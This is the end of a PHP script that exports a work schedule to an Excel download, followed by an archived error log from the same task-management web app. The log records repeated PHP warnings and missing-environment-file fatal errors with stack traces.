$sheet->setCellValue($cellCoordinate, $value); // Apply black color to non-X values if ($value !== 'X') { $spreadsheet->getActiveSheet()->getStyle($cellCoordinate) ->getFont()->getColor()->setARGB(Color::COLOR_BLACK); } $col++; } $row++; } // Set column widths (optional) $sheet->getColumnDimension('A')->setWidth(25); // Adjust width as needed $sheet->getColumnDimension('B')->setWidth(20); $sheet->getColumnDimension('C')->setWidth(15); // Set headers for Excel file download header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'); header('Content-Disposition: attachment;filename="schedule_export_' . date('Y-m-d') . '.xlsx"'); header('Cache-Control: max-age=0'); // Save Excel file to PHP output (browser will download it) $writer = new Xlsx($spreadsheet); $writer->save('php://output'); } // Check if schedule_id is provided via GET request if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['schedule_id'])) { $scheduleId = $_GET['schedule_id']; try { // Export schedule to Excel and initiate download exportScheduleToExcel($scheduleId); exit; // Stop further execution after file download } catch (Exception $e) { // Handle exceptions (e.g., database errors, file saving errors) echo 'Error: ' . $e->getMessage(); } } else { // Handle case where schedule_id parameter is missing echo 'Error: Schedule ID parameter missing.'; } ?> taskprovider/error_log000064400000217055151676701240011221 0ustar00[15-Sep-2024 08:02:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [15-Sep-2024 08:03:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:27:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:29:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:37:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:40:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:41:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:41:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:42:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:43:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 13:46:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 13:50:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 03:19:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 03:20:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 04:28:43 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 04:29:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:02:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:15:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:17:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:21:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:48:43 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 06:09:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 06:38:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 03:19:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:54:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:54:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:55:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:57:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:59:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 06:00:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 12:39:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 00:12:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 00:17:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 02:18:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 04:46:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 07:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 12:26:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 12:32:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:07:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:44:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:45:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:45:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:46:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:46:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:54:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:13:23 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:13:56 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:21:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:24:49 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 01:29:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 04:22:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 01:00:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 01:38:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 22:33:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 22:33:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [03-Oct-2024 22:14:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [03-Oct-2024 22:31:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [04-Oct-2024 04:42:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [06-Oct-2024 21:37:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [07-Oct-2024 21:12:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [08-Oct-2024 00:01:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [09-Oct-2024 01:10:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [09-Oct-2024 04:27:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Oct-2024 05:31:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Oct-2024 05:32:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [08-Nov-2024 04:01:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:13:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:13:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:19:21 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 00:20:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:20:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:24:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:44:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:44:25 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 00:44:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 03:39:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 03:39:15 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 03:39:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 03:39:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:28:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [02-Dec-2024 04:28:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [02-Dec-2024 04:29:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:29:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:30:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [03-Dec-2024 08:30:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [03-Dec-2024 08:32:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:32:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 21:55:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 23:46:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 23:46:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [09-Dec-2024 23:46:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [09-Dec-2024 23:46:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [09-Dec-2024 23:46:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [09-Dec-2024 23:46:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [09-Dec-2024 23:46:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [11-Dec-2024 22:29:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Dec-2024 22:30:01 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [11-Dec-2024 22:30:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Dec-2024 21:56:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [10-Jan-2025 04:57:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Jan-2025 20:12:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Jan-2025 20:25:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:40:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:40:26 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [13-Jan-2025 03:40:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:41:26 UTC] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_alltasks.php on line 19 [13-Jan-2025 22:01:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [14-Jan-2025 23:37:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:01:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:41:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:50:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:50:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 00:12:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 02:05:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 23:38:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [17-Jan-2025 02:20:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [17-Jan-2025 04:56:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [20-Jan-2025 04:13:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [22-Jan-2025 21:27:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [22-Jan-2025 22:11:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [24-Jan-2025 03:45:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [24-Jan-2025 03:46:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 00:29:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 00:30:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 02:40:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 03:38:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 04:45:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [05-Feb-2025 03:15:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [05-Feb-2025 04:25:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 21:36:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 22:32:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 23:57:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Mar-2025 21:46:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [08-Apr-2025 01:34:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [10-Apr-2025 03:33:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Apr-2026 10:57:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:00:40 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:36:50 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:38:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:39:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:41:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:44:49 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:47:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:20:42 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:48:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 